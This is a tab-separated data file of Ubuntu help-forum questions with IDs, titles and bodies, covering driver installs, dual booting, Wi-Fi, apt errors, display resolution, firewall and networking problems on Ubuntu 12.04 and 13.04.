311151	how can i install nvidia driver gt 520 and cuda 5.0 in ubuntu13.04 ?	i 'm just newbie with ubuntu/linux . actually i am attempting to install pyrit which requires gpu acceleration . i have dual-booted ubuntu 13.04 and windows 7 in my desktop pc gigabyte g31m-es2c with : processor : intel core 2 duo ram : 4.00 gb graphics : integrated intel graphics nvidia gt 520 ( i think with optimus ) i have tried many times to install cuda but unsuccessfully . can someone explain to me how to install it with details ? i 've heard about bumblebee , which might help me with an optimus card . how can i make use of it ? i 've heard i have to uninstall nouveau first . when i tried with bumblebee everything seemed perfect except the following error appears : optirun glxgears -info error-bumblebee daemon has not been started yet or the socket path /var/ < ... > error-could not connect to bumblebee daemon - is it running ? i need a way to install pyrit or just cuda , any help is appreciated .
311152	somafm radio rhythmbox 13.04 not working problem	no somafm internet radio channels work for me in rhythmbox , in 13.04 ( using the default install , no extra plugins or upgrades ) . it adds the playlist , resolving the media url , but when i play nothing happens . other internet radio works fine . example playlist and url .
311153	i am trying to install the oracle java sdk and jre manually on ubuntu 12.10	i installed the oracle jdk1.7.0_25 and the jre1.7.0_25 on ubuntu 12.10 . i used the install method at http : //www.noobslab.com/2012/12/install-oracle-java-7-in-ubuntu.html . when i execute `` java -version '' , without the quotes , i get the following : /usr/bin/java : 1 : /usr/bin/java : syntax error : end of file unexpected ( expected `` ) '' ) does anyone know what is going on here ?
311155	same partition : access windows files from ubuntu	i have win and ubuntu on the same partition . mount does not work since the drive is already in use , is there any way to get around it ?
311161	how to install guest additions in lubuntu 13.04	i downloaded virtualbox-4.2_4.2.12-84980~ubuntu~raring_i386.deb ( 63.9 mb ) and oracle_vm_virtualbox_extension_pack-4.2.12-84980.vbox-extpack ( 11.6 mb ) from https : //www.virtualbox.org/wiki/linux_downloads . i installed vbox on my laptop ( dell 1545 core2duo t6400 ; 4 gb ram ) running lubuntu 13.04 giving the guest os ( also lubuntu 13.04 ) 1536 mb ram and 8 gb fixed disk space . performance is okay but i 'm having trouble with the screen size . the desktop does n't occupy the full width of the screen as the image shows ( red ellipses ) . i can use `` scale mode '' but that looks ugly as though things have been stretched horizontally . some reading indicates that installing guest addditions would help . but i ca n't figure out how to install it . i have /usr/share/virtualbox/vboxguestadditions.iso . i 've tried to mount vboxguestadditions.iso : but when i click on devices , install guest additions , i see this window : also puzzling is that there 's an option to `` force unmount '' when the text above says `` unable to mount '' .
311164	using preferences in quickly	there are a lot of questions about some small aspects of it , but , to be honest , there is no explanation at all on the internet of using preferences in quickly . how to bind widgets ' content with u1db ( ? ) entries and refresh them ? i just could n't find anything about it , except for answers to some specific problems .
311165	enable snmp on ubuntu 12.04 to communicate with windows server	i have the newest release of ubuntu 12.04 and windows server 2008 r2 . on the windows server i have a device management agent which keeps track of all the devices in the local area network as well as any information of these devices and alerts sent from these devices . i am trying to enable and setup snmp on the ubuntu desktop . it is a virtual machine in virtual box . i know on a windows 7 desktop you need to set it up so that it accepts snmp packets from the windows server as well as set up a community name ( i.e . private/public ) with a trap destination of the windows server . how do i go about this in ubuntu ?
311172	detecting wireless card in asus a6k	i am trying ubuntu 12.04 ( live from usb ) in my asus a6k . it does not detect the wireless card . what can i do ?
311175	can not use flash in chromium	i need to use youtube . i have flash enabled in chromium 's settings , but it always says `` could not load shockwave '' . i am running lubuntu 13.04
311178	unable upgrade to ubuntu 13.04 from 12.10	i 'm trying to upgrade by using this steps : update the system via terminal ( `` sudo apt-get update & & sudo apt-get dist-upgrade '' ) run `` sudo update-manager -d '' ( where i hope the update manager should open up and tell you : new distribution release â13.04â is available ) but when i did the 1st step from terminal , this happened : > fetched 489 kb in 49s ( 9,954 b/s ) > reading package lists ... done > reading package lists ... done > building dependency tree > reading state information ... done > you might want to run 'apt-get -f install ' to correct these . > the following packages have unmet dependencies : > libc6 : depends : libgcc1 but it is not installed > depends : tzdata but it is not installed > e : unmet dependencies . try using -f. but when i tried to run `` apt-get -f install '' , i got : > e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) > e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? i 'll really appreciate your suggestion , thanks . oh ... i forgot to mention that i 've tried that too ... and the result was : > michael @ ubuntu : ~ $ sudo apt-get -f install > [ sudo ] password for michael : > reading package lists ... done building dependency tree > reading state information ... done correcting dependencies ... > done the following extra packages will be installed : apt-utils debconf > debconf-i18n dpkg gcc-4.7-base libapt-inst1.5 libapt-pkg4.12 > libbz2-1.0 libc6 libdb5.1 libgcc1 liblocale-gettext-perl liblzma5 > libselinux1 libstdc++6 libtext-charwidth-perl libtext-iconv-perl > libtext-wrapi18n-perl perl-base tar zlib1g > suggested packages : xz-utils debconf-doc debconf-utils whiptail dialog gnome-utils > libterm-readline-gnu-perl libgtk2-perl libnet-ldap-perl libqtgui4-perl > libqtcore4-perl apt glibc-doc locales bzip2 ncompress > the following new packages will be installed : apt-utils debconf debconf-i18n dpkg > libapt-inst1.5 libapt-pkg4.12 libbz2-1.0 libdb5.1 libgcc1 > liblocale-gettext-perl liblzma5 libselinux1 libstdc++6 > libtext-charwidth-perl libtext-iconv-perl libtext-wrapi18n-perl > perl-base tar zlib1g > the following packages will be upgraded : > gcc-4.7-base libc6 2 upgraded , 19 newly installed , 0 to remove and 1 > not upgraded . 2 not fully installed or removed . need to get 0 b/11.3 > mb of archives . after this operation , 22.3 mb of additional disk space > will be used . do you want to continue [ y/n ] ? > y > debconf : unable to initialize frontend : dialog debconf : ( dialog frontend requires a > screen at least 13 lines tall and 31 columns wide . ) debconf : falling > back to frontend : readline > e : can not get debconf version . is debconf installed ? debconf : apt-extracttemplates failed : ( reading database ... 479 files and directories currently installed . ) preparing to replace libc6 : amd64 2.15-0ubuntu20.1 ( using ... /libc6_2.17-0ubuntu5_amd64.deb ) ... debconf : unable to initialize frontend : dialog debconf : ( dialog frontend requires a screen at least 13 lines tall and 31 columns wide . ) debconf : falling back to frontend : > readline checking for services that may need to be restarted ... > checking init scripts ... checking for services that may need to be > restarted ... checking init scripts ... nothing to restart . dpkg : error > processing /var/cache/apt/archives/libc6_2.17-0ubuntu5_amd64.deb > ( -- unpack ) : subprocess new pre-installation script returned error > exit status 2 dpkg : regarding ... /libbz2-1.0_1.0.6-4_amd64.deb > containing libbz2-1.0 : amd64 , pre-dependency problem : libbz2-1.0 > pre-depends on multiarch-support multiarch-support is unpacked , but > has never been configured . > > dpkg : error processing > /var/cache/apt/archives/libbz2-1.0_1.0.6-4_amd64.deb ( -- unpack ) : > pre-dependency problem - not installing libbz2-1.0 : amd64 errors were > encountered while processing : > /var/cache/apt/archives/libc6_2.17-0ubuntu5_amd64.deb > /var/cache/apt/archives/libbz2-1.0_1.0.6-4_amd64.deb > e : sub-process > /usr/bin/dpkg returned an error code ( 1 )
311182	black screen after ubuntu loads ( lightdm )	so , i have this problem , lightdm does n't appear , after ubuntu 12.04 loads , it shows a black screen with a white bar on the command line . i know the problem is lightdm , because last time i used ubuntu on my laptop , i closed the lid and reopened , and the lock screen did not appear ... what is wrong ? do i have to reinstall lightdm ? i do n't care if i have to install gdm , as long as i can change the desktop environement , i 'm alright with gdm ... how can i repair lightdm ?
311184	terminal and software center dissapear , unity will not initialize after power cycle	i am currently running on a live usb . i was trying to boot up a windows xp iso on virtualbox when terminal and software center completely disspeared from my system ( ctrl-alt-t does not work ) . my first instinct was that something got misconfigured in the vb install , so i power cycled . now , unity does not start ( other programs are still running , as i am getting desktop notifications from chrome and such ) . i 've tried dpkg and all the recovery options from grub . is there perhaps any way to re-install ubuntu while keeping the files intact ?
311185	installed ubuntu 13.04 but automatically loads windows , does n't let me choose	i installed ubuntu without a problem , but when i turn on the computer it automatically loads windows without asking which one i want to load . i have an acer aspire v5-531 running windows 7 home premium .
311188	in libre office , the style changes randomly when i press return	in some most documents i 'm editing , when i press return to move to a new paragraph , the previous paragraph changes style to what i can only describe as random . each document has a different style that it likes to change to ... it is n't always a heading style that it changes to . here 's a youtube video recording of my screen : http : //www.youtube.com/watch ? v=ebaaamfu-ie ubuntu 12.04 libre office 3.5.7.2
311191	black screen after select installing on a dell inspiron 14z	i 'm trying to do a dual boot on my dell inspiron 14z notebook , but i always get a black screen after selecting install ubuntu . i 've tried to add nomodeset and acpi_osi= '' linux '' to the boot options , but it does n't change anything . the hardware : 3rd generation intel® core™ i7-3517u processor ( 4m cache , up to 3.0 ghz ) 8gb2 dual channel ddr3 sdram at 1600mhz 500gb 5400 rpm sata hdd and 32gb msata ssd amd radeon hd7570m 1gb this question is n't duplicated . i 've already tested all tips in the following question ! my computer boots to a black screen , what options do i have to fix it ?
311194	recover windows	i have installed ubuntu 13.04 on my pc using usb drive . after intalling ubuntu-gnome 13.04 i went and opened the app `` disks '' and clicked on the 1st disk drive and then on the right side i clicked on the `` file system partition '' and by mistake i clicked the button `` more action '' and did something and i lost my windows os , but i have all the data , i can see it from ubuntu file explorer . when i started my pc after my blunder ( wehich i did n't know at the time ) . it automatically boot into ubuntu .. and not windows . : ( please help me .. i do n't know what to do now .
311198	ebook software compatibility	moving from windows xp -- there i 've used sigil , calibre , pdf-viewer , and the .epub file format . if i have authored ebooks with these in windows -- will i be able to transfer these to ubuntu , or will i have to reformat them ?
311200	gimp 2.8 themes are n't applying after i select them	i want apply themes to gimp 2.8 in particular i want it to look like photoshop ( now at least ) i tried putting in a gtk2 theme in the themes folder under .gimp in my home and placing the gtkrc file under the same themes folder ... the themes do list out in the list under theme preferences but they do n't get applied ... ( i did restart gimp ) what 's possibly wrong ?
311207	brasero makes unusable dvd 's	brasero is fond of writing .md5 crc files on the dvd . most dvd players are allergic to stray files and refuse to play dvd 's with .md5 files written on them why on earth does brasero do this and how can it be stopped . oh , while we are here , i tried brasero 's video writer , but it refused to write a directory and demanded a single file . the dvd source i have , uses a video_ts directory . this is a common industry standard .
311208	authentication method for likewise to join a domain	i installed likewise and joined my an active directory domain . i 'm finding it 's a bit unclear on how the default authentication works . do i have to do any extra configuration to enable kerberos ? if i do , then what authentication method is default ?
311212	computer locks up on `` last screen '' when restarting/shutting down ubuntu 12.04	every time i restart or shut down my new installation of ubuntu 12.04 , i get to a black screen and the computer just hangs there forever . the only way to get past that is through the physical restart/shutdown button . when i do restart the machine that way , next time ubuntu starts , there 's no indication that a faulty shutdown occurred , everything proceeds as intended . i would love to investigate this issue and figure out what 's going on , since not being able to restart the machine remotely is a show stopper . are there any logs i could look into to understand this better ? any other advice ? edit : link to the q87m-e motherboard , in case that helps .
311217	ca n't back to unity after install pantheon	i tried install pantheon with no success and after that i tried go back to unity , but my desktop is ugly now . tried logout/login and change to default , removed purge pantheon repositories , reset/replace unity . simply i ca n't go back to unity . i tried almost everything i read on web . anyone can help me please ?
311220	launching smath	i am trying to find a way to launch smath without the terminal . currently i can only launch it through the terminal with sudo mono /usr/local/smath/smathstudio_desktop.exe how can i lock it to the launcher on the side so it is easier to start . please note that i am very new to linux .
311221	ubuntu 13.04 , atheros ar9287 ath9k driver , airmon-ng fixed on channel -1	airmon-ng was working fine out of the box with ubuntu 12.10 , but after upgrade , mon0 is fixed on channel -1 . i am using kernel 3.8.0-25-generic . any ideas ? thanks in advance .
311224	partition for other linux distros	i have 320 gb of hdd and installed ubuntu to all partition but what if i want to install debian or any other linux distro to the remaning drive parts that are not in use ? thanks in advance !
311225	terminal command for uninstalling programs	what is the terminal command for easily uninstalling programs or software ?
311229	ssh password problem	i have connected 2 machines via ethernet cable , 192.168.1.2 ( master ) & 192.168.1.3 ( slave ) . i can ssh both and even ping command also works fine . trouble is while running hadoop & nutch i have to ssh the other machine , comes a part where ssh asks for password like this : '' root @ 192.168.1.2 password : root @ 192.168.1.3 password '' wonder whose password should i be giving , ? master 's ? or slave 's ? or should it be '' master 's pswrd : slave pswrd '' ? thanks .
311231	none of the software i have bought can be installed in 13.04 , how can i get it all back ?	i have attempted to reinstall previous purchases via the software center . i am aware that some of the trashier devs ( super meat boy ) have decided to drop support for linux , so the software center does n't allow me . it tells me that it does n't have a package for my version of ubuntu . fine . however , all of my other games ( and there are quite a lot of them ) harbor no complaints with the software center . if i try to install any of these , it correctly adds the private ppa to my sources.list . however , upon updating apt , i always get a 401 , regardless of the package . this is a fresh install . why am i unable to use any of my bought games on 13.04 ?
311233	desktop ubuntu 13.04 nexus 7 ( grouper ) mirror download ?	the guide for installing ubuntu on nexus 7 takes me to http : //cdimage.ubuntu.com/daily-preinstalled/current/ which 404 's . i have searched with no luck for mirror images of ubuntu desktop ( not phablet ) . are there are any official mirrors left or anyone got a mirror download link ? if it is of any significance i am going to use it with multirom .
311236	where to get the linuxdrivers for my printer canon pc-d320 ?	i have got a canon pc-d320 and i would like to print something . but unfortunatly , that drivers are n't listed in the list of drivers in ubuntu . so i was searching on the internet for that , but i dind't find something . so if anyone could get me a link to download and a description how to install the drivers , it would be really nice . i 'm a beginner on linux , but i want to get more practised . thanks a lot ! jenne
311238	where do i download the source code to unity next ?	http : //unity.ubuntu.com/getinvolved/development/unitynext/ when following the instructions of this page , to download source , my ~/unity/unity-next becomes a branch , but the folder is empty . how can i download the source of unity next ?
311239	downloaded 13.04 on inspiron 3520 , at start it gives me two icons windows and ubuntu , windows works great , ubuntu gives error message	recently downloaded ubuntu 13.04 on my windows desktop . it downloaded and partitioned automatically , after restart , two icons emerged , for the dual boot one for windows 8 the other for ubuntu , windows icon works great and pulls up windows 8 , the ubuntu icon , is a little slow and then brings up this error message . `` windows failed to start , a recent hardware change might be the problem '' it continues on `` insert windows reinstall , choose language then next click repair , if you do n't have disc contact system admin file/ubuntu/winboot/wubi/dr.mr , status oxcooooo7b required file is missing or contains errors . '' this has done this for three different versions of ubuntu i have tried to install 12.04 , 12.10 and now 13.04 . is there something i am missing ? i am dual booting , from desktop , not a cd , from some reason even when i boot from cd first it does not start .
311242	red triangle with exclamation mark , next to wifi symbol , in ubuntu 13.04	i have a red triangle at top on screen , that says '' the update information is outdated . this may be caused by network problems or by a repository that is no longer available . please update manually by selecting show updates from the indicator menu and watching for any failing repositories . my os is up to date and my network is working fine , so i dont know why it is there , it usually takes time to appear after turning on laptop by it always returns even though im up to date . anyone got any ideas on what this is and how to fix/ get rid of it ? ? i have tried sudo apt-get update and the terminal fails to update ; > http : //ppa.launchpad.net/upubuntu-com/office/ubuntu/dists/raring/main/binary-i386/packages i have also done sudo apt-get upgrade .
311246	pages are visually corrupted in chrome	pages are loading fine in chrome , but then some kind of jitter appears . it happens on pages with and without flash . i 'm on ubuntu 13.04 with intel hd 3000 video card . how do can i figure out what 's the problem ? upd : same bug happens in steam client .
311247	why can i boot xubuntu 12.04 from usb on one computer but not the other ?	when i boot xubuntu from a flash drive on the old dell computer mentioned in the about me screen it works fine , but when i try to boot it on another computer ( the computer i 'm typing this text on ) it says `` boot errror '' and i have to manually shut it down . when i take out the flash drive , it boots windows xp fine . please help ! by the way , i have n't tried booting any other oses from usb on this computer .
311248	cmake fails with `` could not find hdf5 ''	my project compiles flawlessly in mac os x and now that i try building in ubuntu 12.x latest as of today , i get the error -- could not find hdf5 ( missing : hdf5_libraries hdf5_include_dirs ) . if i take the hdf5-dev package using apt-get cmake will find hdf5 but my code will not compile due to the hdf5-dev package being older . i tried downloading the latest hdf5 and building from source : cd $ hdf5_root ./configure /usr/local/hdf5 sudo make install and this successfully installs hdf5 under directory /usr/local/hdf5 but cmake wo n't find it . i also tried setting the environment variables $ hdf5_root and $ hdf5_root_dir_hint but still does n't work . any suggestions ?
311249	how can i download play counts from lastfm to banshee 2.6.1 on ubuntu 13.04	how would i download play counts from last fm to my banshee 2.6.1 on ubuntu 13.04 installation ? i know that the there is a banshe-lastfm-sync-master script on github , but i ca n't get it to work . can any one advise how the play counts can be obtained ?
311254	can unity provide german-english translations or german word definitions ?	i have just installed stock ubuntu in german so i can practice the language , but every once in a while i encounter some word i 'm not familiar with . currently , i open a browser and search for a translation or definition of the word in order to understand what the os is trying to tell me , but i 'm looking for a cleverer and faster solution . is there any way i can get the dash to quickly give me the definition of a word in german and/or its english translation ? a one-command terminal solution would also be an improvement from my current method .
311256	aspire acer v3-571g-9686 : wireless issues	i 've had the computer for around 4 months , so it 's still relatively new . the core of the issue is that every so often i 'll be booted off my wireless . sometimes the wireless continues to say connected but the net is n't working , sometimes it switches to limited , and sometimes it just boots me completely off and i try to reconnect only to run into issue number one ( says `` connected '' , but nothing is happening ) . sometimes this happens almost non-stop every 5-10 minutes for a few hours ; sometimes it does n't happen for days at a time . i have n't noticed any trends in terms of my location , the time of day , the amount of items connected to the router , etc . i initially thought the issue was connected to our wireless because a few devices in the house were having different but seemingly related problems ( playing online video games on wireless with random spiking lag and a smart tv that downright refused to stream as it should ) . we recently upgraded our router to fix these issues . all the other devices are fine now , running smooth as butter , while my issue remains exactly the same . any ideas or further information i can provide that would be helpful ? thanks !
311258	software center prompts to make me buy already bought software	could n't really get that title right ... my problem today is that i upgraded to ubuntu 13.04 and now i can not install amnesia , a already bought peace of software , from the software center . i 'm logged in , i 've checked reinstall previous purchases and i 've continued through the buying process all the way to payment . now , if you can not help me here , i have another solution as i have the files saved on an external harddrive , but ... i do n't know how i get it `` installed '' searchable through the unity dash and so on . i really like to be able to install it from the software center so if you know any solution there i 'd be very glad . thanks !
311263	how do i take win 7 off a dual boot mini	i have an hp mini with dual boot ubuntu 12.04 and win 7 . i am very green at linux and would like to take the win 7 off and have a linux only mini . no cd drive so it would have to be done with a jump drive or a usb cd drive .
311271	raid partition setup	i have 4 drives that i would like to install a raid 5 on . 1 ) 80gb 2 ) 2tb 3 ) 2tb 4 ) 2tb can someone help me figure out what the partition setups should look like ? i am installing ubuntu server 12.04 lts . thanks
311272	how to configure static ip 's ( internal or lan ip ) in my ubuntu ( vps )	first of all greetings to all i have a problem with ubuntu i am running ubuntu server 12.04 lts with gui ( gnome ) well its a vps this is my eth0 eth0 link encap : ethernet hwaddr 8e : a3:65 : ba:83 : bc inet addr:207.xxx.xxx.27 bcast:207.xxx.xxx.31 mask:255.255.255.248 inet6 addr : fxxx : :8cxx:6xxx : fxxx:83bc/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:269487 errors:0 dropped:68 overruns:0 frame:0 tx packets:202111 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:39408403 ( 39.4 mb ) tx bytes:92849451 ( 92.8 mb ) i have eth0 , vboxnet0 and virbr0 interfaces now the problem is my eth0 has external ip address configured i have install virtualbox now i am not getting internet in bridge interface nat is fine but when i configure the vbox in nat host system ( ubuntu ) couldnt ping the os inside vbox now is there any way to give a static ip 's ( lan like 192.168.1.1 ) to my host ( ubuntu ) and configure the same in bridge mode inside the vbox please do help me
311281	ubuntu 13.04 lenovo m490 info @ wl_cfg80211_attach : registered cfg80211 phy	i 've installed ubuntu 13.04 ( latest updates , kernel 3.8.0-25-generic ) on this machine and got several issues : when i restart the laptop the monitor displays : [ 9.171781 ] info @ wl_cfg80211_attach : registered cfg80211 phy i do n't know if it 's a known bug in this combination . the issue is common known on other hardware configs . [ eric @ ubuntu : shell ] $ dmesg | grep cfg80211 [ 9.126810 ] cfg80211 : calling crda to update world regulatory domain [ 9.171781 ] info @ wl_cfg80211_attach : registered cfg80211 phy [ 9.372793 ] cfg80211 : world regulatory domain updated : [ 9.372797 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 9.372798 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 9.372799 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 9.372800 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 9.372801 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 9.372802 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 16.114689 ] cfg80211 : calling crda for country : us [ 16.117140 ] cfg80211 : regulatory domain changed to country : us [ 16.117143 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 16.117144 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) [ 16.117145 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) [ 16.117146 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 16.117147 ] cfg80211 : ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 16.117148 ] cfg80211 : ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 16.117149 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) i get the message . i hope anyone can help me to identify if it 's a bug or not .
311283	unable to install ubuntu on an imac	i download the install .iso from the ubuntu download site , no problems . i burn the iso to a dvd medium as a disc image on my windows computer , no problem . i take that dvd over to my imac , and it wo n't read the disc . the imac is running osx now , i want ubuntu on it .
311285	13.04 installed on parallels on osx . very slow graphics performance	i installed 13.04 on my macbook pro running parallels . everything works pretty well but when showing and hiding windows the performance is very slow . i read around a bit . i 'm running 64 bit , 3.9 gib memory , intelâž coreâ˘ i7 cpu m 620 @ 2.67ghz i ran /usr/lib/nux/unity_support_test -p and got : not software rendered : no not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no older solutions to this problem for previous ( 12.xx ) versions do not apply here since there appear to be no unity controls in the system settings . so my question is this . what do i need to do to get these window fades to speed up or how do i simply turn off this somewhat redundant feature without screwing other stuff up ? thanks for your ideas .
311286	adding a large asus monitor resolution	i am trying to set up this monitor : http : //commercial.asus.com/product/detail/vs247h-p-lcd-monitor i am able to connect the monitor and use it in various screen configurations , but have not yet been able to set it to the correct 1:1 resolution . the resolution listed for this monitor is 1920 x 1080 . this does not appear as an option in the `` displays '' gui when i plug in a vga cable . so , i attempted to follow the instructions here for adding resolutions : https : //wiki.ubuntu.com/x/config/resolution my attempt : $ cvt 1920 1080 # 1920x1080 59.96 hz ( cvt 2.07m9 ) hsync : 67.16 khz ; pclk : 173.00 mhz modeline `` 1920x1080_60.00 '' 173.00 1920 2048 2248 2576 1080 1083 1088 1120 -hsync +vsync $ xrandr -- newmode `` 1920x1080_60.00 '' 173.00 1920 2048 2248 2576 1080 1083 1088 1120 -hsync +vsync $ xrandr -- addmode crt1 1920x1080_60.00x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 156 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 29 current serial number in output stream : 30 the same thing happened with two different laptops . in case it helps , this is what the output of xrandr looks like ( for one of the laptops ) : $ xrandr screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 1600 x 1600 lvds connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 344mm x 193mm 1366x768 60.0*+ 1360x768 60.0 1280x768 60.0 1280x720 60.0 1024x768 60.0 1024x600 60.0 800x600 60.0 800x480 60.0 640x480 60.0 dfp1 disconnected ( normal left inverted right x axis y axis ) crt1 connected 1360x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1600x1200 60.0 + 1400x1050 60.0 1600x900 60.0 1280x1024 60.0 1440x900 59.9 1280x960 60.0 1360x768 60.0* 1280x800 59.8 1152x864 60.0 1280x768 59.9 1280x720 60.0 1024x768 60.0 1024x600 60.0 800x600 60.3 800x480 60.0 720x480 60.0 640x480 59.9 1920x1080_60.00 ( 0xef ) 173.0mhz h : width 1920 start 2048 end 2248 total 2576 skew 0 clock 67.2khz v : height 1080 start 1083 end 1088 total 1120 clock 60.0hz the `` displays '' gui gives the following error when i attempt to set up dual-monitor arrangements which would create virtual screens larger than 1600x1600 : '' the selected configuration for displays could not be applied : requested position/size for crtc 148 is outside the allowed limit : position= ( 1366 , 0 ) , size= ( 1360 , 768 ) , maximum= ( 1600 , 1600 ) '' a maximum of 1600x1600 would rule out the correct resolution , so perhaps this has to do with the problem . any suggestions appreciated !
311287	acer timelinex 4820tg fan speed out of controll after install ubuntu 12.04	laptop acer aspire timelinex 4820tg . dual boot windows 7 and ubuntu 10.10 despite some small bugs the machine runs fantastic with this software . after installing ubuntu 12.04 the cooling fan runs like crazy . even if i just in bios the fan starts crying at full speed as well as when i boot windows 7 in bios there is no possibility to influence the fan control.it seems the bios is different from other machines . ( no advanced / power / tap ) does anybody have a idea how to set the fan control back to the old settings . please do not talk in short cuts and in computer language i am only a advanced user thank you
311288	fn+f2 will not enable wifi	i have a dell inspiron 640m and i have looked at many other answers i have tried the rfkill and it does n't display anything i have tried looking at answers for three days and nothing has worked . how can i activate the fn+f2 key ? i have been in chat rooms and people have tried to help as well but i have not received a working answer please try and help ! i have tried the mod approach as well and it has not come up with anything that has helped me either .
311290	dual booting ubuntu and fedora	i 'm thinking about dual booting my current ubuntu 12.04 os with fedora 18 . my question is when i shrink the current ubuntu partition , which takes the whole disk ( with gparted ) will i be able to share the swap current swap partition with fedora ? and will the swap partition move with ubuntu or will it stay at the far right side of the drive partition map ( from gparted 's point of view )
311295	dash has odd texture since update	ever since i updated , my dash has had an odd texture glitch , showing a kind of green and orange tiled texture . i 'd post a picture but ca n't . the major point is that it is not the standard black texture it used to be . what 's causing this ? and secondly , does this indicate anything major ?
311298	i can not reduce the screen brightness on my acer aspire 5742	i can not reduce the screen brightness in ubuntu 13.04 , my device is an acer aspire 5742 . ubuntu systems settings says the graphics driver is `` intel速 ironlake mobile x86/mmx/sse2 '' but my laptop comes with `` intel hd graphics '' . so i assume it 's a problem with my graphic drivers . it would be great if some one could tell me how to uninstall my current driver and install the correct one . thank you .
311302	problem : ufw enabled with deny/deny , however ssh inbound still works . please help	in order to lock down my server , i installed ubuntu with ufw . i run a vm inside the server that hosts a ssh server . i opened the server and ran ufw and set deny to send and deny to recieve . now it looks like the server is blocked from inbound and outbound , which is good ... but , when i tried to use my other laptop to ssh into the server 's vm , it still got in . why is that ? server : ubuntu 1204 ufw on , deny deny enabled virtualbox , with vm ( xubuntu 1204 , installed sshd ) my laptop : ubuntu 1204 can you help me fix this problem so that ufw blocks the virtualbox ubuntu vm also ? thanks for your help .
311303	how to update dolphin file manager in real time	if i have dolphin open and i 'm working in the terminal or on windows files might be moved or added . how would i go about to make sure it updates the status of a directory of real time ? presently i can not even use back to update and constantly have to reopen dolphin , verry annoying
311307	remove grub when there is no ubuntu	i installed ubuntu 12.04 on my partitioned hard disc : /dev/sda /dev/sda1 ntfs windows /dev/sda2 ntfs backup disk /dev/sda3 ext4 ubuntu 12.04 i can boot from ubuntu and windows via grub . now , i decided to remove the ubuntu since i 'm always stuck with getting the driver to work properly on my radeon hd 7770 ( always causing boot failure ) . i can not find ways to uninstall it ( there is an option in the installer where remove ubuntu 12.04 and reinstall it but that does suits ) , so i decided to delete the ubuntu partition in /dev/sda3 thinking it would solve the problem . however , when i restarted my desktop the grub ( purple background ) still shows the ubuntu , memory test , windows ( loader ) . i want to remove this so that my desktop will boot directly from windows .
311310	suunto gps watch usb problem	newbie to linux here . i see there are other `` same type '' questions and i hope someone kindly helps me out . i do not know enough to convert other posts to a solution for myself . i have a suunto ambit gps watch and i am running ubuntu 13.04 . the usb device is not showing up . i see from some other posts you want a dmesg . here it is : usb 3-1 : new full-speed usb device number 5 using xhci_hcd usb 3-1 : config 1 has an invalid interface number : 1 but max is 0 usb 3-1 : config 1 has no interface number 0 usb 3-1 : new usb device found , idvendor=1493 , idproduct=0010 usb 3-1 : new usb device strings : mfr=1 , product=2 , serialnumber=3 usb 3-1 : product : ambit usb 3-1 : manufacturer : suunto usb 3-1 : serialnumber : 18b79a4617002000 i believe line two is the issue . i am using vituralbox and windows client to run the movescount software . i just converted over to linux , so i really do not want to have to go back to windows , just for support for my watch ...
311311	ubuntu server 12.04 lts : internet connection not working , have tried forum fixes	so , i 've installed ubuntu server 12.04 lts because of it 's minimal processor/memory usage on a former compute node that i 've repaired . my goal is to get it connected to my home internet through my cable modem/ethernet so that i can install the various packages i need to compile and run my particle simulation packages . unfortunately , i have tried the standard approaches given on several forums including this one , and i have not been successful . i am very much a novice/absolute beginner at all of this , so i appreciate all of the time and help ! here is what i have tried thus far : sudo ifconfig eth0 up then i edited the network interface file so it looks like this : # the loopback network interface auto lo iface lo inet loopback # the primary network interface -- use dhcp to find our address auto eth0 iface eth0 inet dhcp now i execute this : dhclient -r sudo /etc/init.d/networking restart for which i get this : *running /etc/init.d/networking restart is deprecated because it may not enable again some interfaces *reconfiguring network interfaces ... ssh stop/waiting ssh start/running , process 1355 then when i try to ping google : ping 64.233.169.104 i get nothing displayed ... . now , when i run : route -n i get ... kernal ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 98.180.56.1 0.0.0.0 ug 100 0 0 eth0 98.180.56.0 0.0.0.0 255.255.252.0 u 0 0 0 eth0 i very much appreciate any help that you can give me ! thank you , matt
